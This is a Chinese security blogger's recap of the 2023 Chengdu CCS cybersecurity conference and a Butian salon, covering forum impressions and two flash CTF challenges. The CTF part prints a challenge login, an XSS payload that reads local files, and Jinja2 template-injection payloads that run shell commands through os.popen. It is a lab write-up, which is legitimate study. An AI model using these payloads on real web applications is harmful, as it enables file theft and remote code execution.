前言
今年很巧,8月23日项目结束后,24号2023成都CCS网络安全大会就召开了。我今年刚好在武汉做项目,想了想,结束直接一个飞机飞往成都,开启了本次成都安全之旅。成都的师傅们都很热情,也结识了不少新的朋友,参加了成都CCS大会以及补天城市沙龙,感觉收获颇多,故写本文记录一下。
由于参加项目和大会的缘故,博客已经一个半月还未更新了,直到今日才有闲暇之时来落笔本文,各位师傅见谅哈哈。
补天城市沙龙合照:
在补天城市沙龙上,有幸和网络尖刀安全团队的创始人曲子龙师傅(右四)重磅面基,在交流中学习到了很多东西
CCS网络安全大会合影:
由衷感谢无糖信息的HZEX师傅,给了我很多礼物哈哈~
注明:本文图片比较多,可以往下拉跳过图片,看一下我个人的总结
议程介绍
因为先去的是成都CCS网络安全大会,我们就先看成都CCS网络安全大会的议程
由于CCS网络安全大会是有多个论坛共同开展,所以我这边贴出我所出席的论坛:
8月24日下午参加了「AI大模型安全论坛」
8月25日上午参加了「云安全与通信安全论坛」
8月25日下午参加了「数据安全与数据治理论坛」
8月26日上午参加了「Web3与安全态势感知论坛」和「开发安全与人才培养论坛」
{/collapse-item}
{/collapse-item}
8月24日下午
本来8月24号早上有开幕式,但飞机到的比较晚,就参加了下午的「AI大模型安全论坛」
近两年,大模型、AI、人工智能、大数据等关键词,逐渐走入大众的视野之中。以ChatGPT为首的一众产品,迅速火遍国内外。当然,对于大模型的风险、安全问题以及应对手法也在网络安全圈子里被着重讨论。
ChatGPT大语言模型的到来,其实是改变了人类原有的获取知识的途径。从原本使用搜索引擎搜索-打开相关网页-参考多个来源的网页-归纳答案,到最后使用大语言模型查询问题-得到归纳好的结果。大大提升了知识的获取效率,从而间接的大大提升了工作效率。
但大模型并不是安全的,如上图所示,它也能被投毒,也能被恶意利用。之所以为什么现在还没有受到影响,是因为相关的模型还没有应用到实际的生产生活当中去,根据大会演讲嘉宾的预测,在2024年针对大模型的安全攻击将对生产系统产生实际危害。
有些师傅会问我是怎么看待人工智能、大数据等领域的,可以看我之前写的一篇文章: 2023西湖论剑·数字安全大会有感
8月25日上午
8月25日上午,主要看的就是「云安全与通信安全论坛」
有些师傅可能知道,今年我应TeamsSix(著名云渗透利用工具CF开发者)师傅的邀请,加入了 国际云安全联盟(CSA) 渗透测试工作组。在未来的时间,我也会将大量的精力放到云安全领域。
对于云安全,其实我想说的是云安全远远没有我们看到的那么简单,深入学习云安全之后,会发现云安全里面涉及的内容很多很多。同时云上环境和云下环境有着云泥之别,做云上渗透和云下渗透的姿势截然不同。
这部分的内容,我的博客后续也会相应跟进和更新。
8月25日下午
8月25日上午,主要看的就是「数据安全与数据治理论坛」
下午其实都是安全治理之类的,感兴趣看看~
8月26日上午
8月26日上午,主要看的就是「Web3与安全态势感知论坛」和「开发安全与人才培养论坛」
Web3和区块链安全,也是未来的一个趋势。但目前该区块的政策指向性并不明朗,可以先入手学习,但要看后面几年国内具体的情况,你应该懂我的意思。
对于最后钟麒嘉宾讲的《Redteam内网横向移动与流量对抗》,对我来说其实印象深刻。也对内网相关的横向移动和流量对抗有了新的思路和理解,可能后续博客的一些更新内容会来深入研究这部分的内容。
RPC( Remote Procedure Call),远程过程调用,相比于IPC来说RPC就是基于远程的工作机制,说白了RPC也是一种进程间通信方式,它只不过可以允许本地程序调用另一个地址空间的过程或者函数,而不用程序员去管理调用的细节。对于IPC来说,程序只能调用本地空间的函数,而RPC机制提供了一种程序员不必显示的区分本地调用和远程调用。
8月27日-补天城市沙龙
当当当,接下来来到补天城市沙龙环节~
由于当时我和我徒弟ThumpBo在酒店做渗透项目,去的比较晚,而且那边成都沙龙人好多好多~就没有拍议题照片了哈哈~
(找到哪个是我了吗?)
最让我印象深刻的是“补天白帽之夜”的快闪CTF这个环节,共有两道CTF题
快闪CTF-第一题
第一道是登录+文件上传CTF,截图如下:
登录这边给提示了,账号是系统常用账号,密码是和补天沙龙有关的
然后我们愣是没猜出来,也可能是太紧张了哈哈~账号密码如下:
sysadmin Butian@0827
登录后,截图如下:
通过创建空白PHP文件并逐步写入内容从而造成任意文件上传,具体可以参考奇安信攻防社区的这篇文章: 记某系统有趣的文件上传
这道题坐在我旁边的谢队(Nyr4ki)师傅比我手速更快,成功拿下一血哈哈~
快闪CTF-第二题
第二题是从XSS到任意文件读取到RCE,截图如下:
说实话,这种题目我是第一次见过,再者Python Falsk的Web框架也是第一次碰到,没有啥经验,就智能看着别的大佬秀了~
这道题,可以参考奇安信攻防社区的这篇文章: 记一次从xss到任意文件读取
任意文件读取的Payload:
<script>
x=new XMLHttpRequest;
x.onload=function(){
document.write(this.responseText)
};
x.open('GET','file:///app.py');
x.send();
</script>
在 Education
那个栏目,输入以上Payload就可以看到 /app.py
就Web服务的源码
通过分析拿到的源码,可以构造以下Payload进行RCE:
<iframe src='http://127.0.0.1:54425/7c4a8d09ca3762af61e59520943dc26494f8941b?payload={{config|attr("__class__")|attr("__init__")|attr("__globals__")|attr("__getitem__")("os")|attr("popen")("ls")|attr("read")()}}' width="800" height="800">
执行 ls
命令,可以看到有个文件夹:
然后再执行 cat
命令读取文件夹下的 flag
文件,即可拿到Flag:
<iframe src='http://127.0.0.1:54425/7c4a8d09ca3762af61e59520943dc26494f8941b?payload={{config|attr("__class__")|attr("__init__")|attr("__globals__")|attr("__getitem__")("os")|attr("popen")("cat /there_is_no_flag_really/flag")|attr("read")()}}' width="800" height="800">
本来这两道题目,我都拿到源代码细细研究,准备发一篇文章细细讲讲的
但问了一下出题的杨晨师傅(同时也是沙龙议题的演讲者),师傅说最好不要公开,索性作罢哈哈~希望你能从我给出的内容中学习到新知识~
后续我和谢队(Nyr4ki)师傅研究这两题研究了好久,还被补天的小姐姐拍下来发到公众号上面去了哈哈:
重磅面基
同时,在此次补天城市沙龙上,有幸和网络尖刀安全团队的创始人曲子龙师傅重磅面基
在和大佬的交流中,其实不难看出几点内容:
- Java和Go的学习非常有必要,Python需要向Go进行发展(也不是说Python不重要),主要是Python对于我们行业的需求来说,还有不少弊病
- 目前整体安全行业的态势并不是很好,需要从新赛道寻求突破口
人才需求是还在那的,但需要高端的人才需求,技术实力非常重要
还有一个就是,大佬在四川重庆需要有大数据及大数据分析的人才,感兴趣的可以联系曲子龙师傅或者我,哈哈~
很可惜没有和大佬合个影哈哈~
总结
其实参加这种安全大会,我们作为网络安全工作者,主要是有以下目的:
- 看最新的政策走向,看最新的网络安全行业趋势,并根据结果做好未来的职业规划或战略转变(如果你是企业家的话)
- 看最新的技术成果,看各家的压轴项目和技术输出做的怎么样,从中得以管中窥豹,得出这个分支行业走到怎么样的阶段了
- 学习前沿的网络安全框架、架构以及思维,从优越的分享者身上学习他们的技巧
本次成都之旅收获颇丰,也有许多精华和内容等待我的整理。后续会持续在我的个人博客上持续产出技术内容,感谢各位师傅的关注和支持~
同时也非常感谢成都的师傅们,非常热情哈哈~不枉此行,有缘再见!
评论 (2)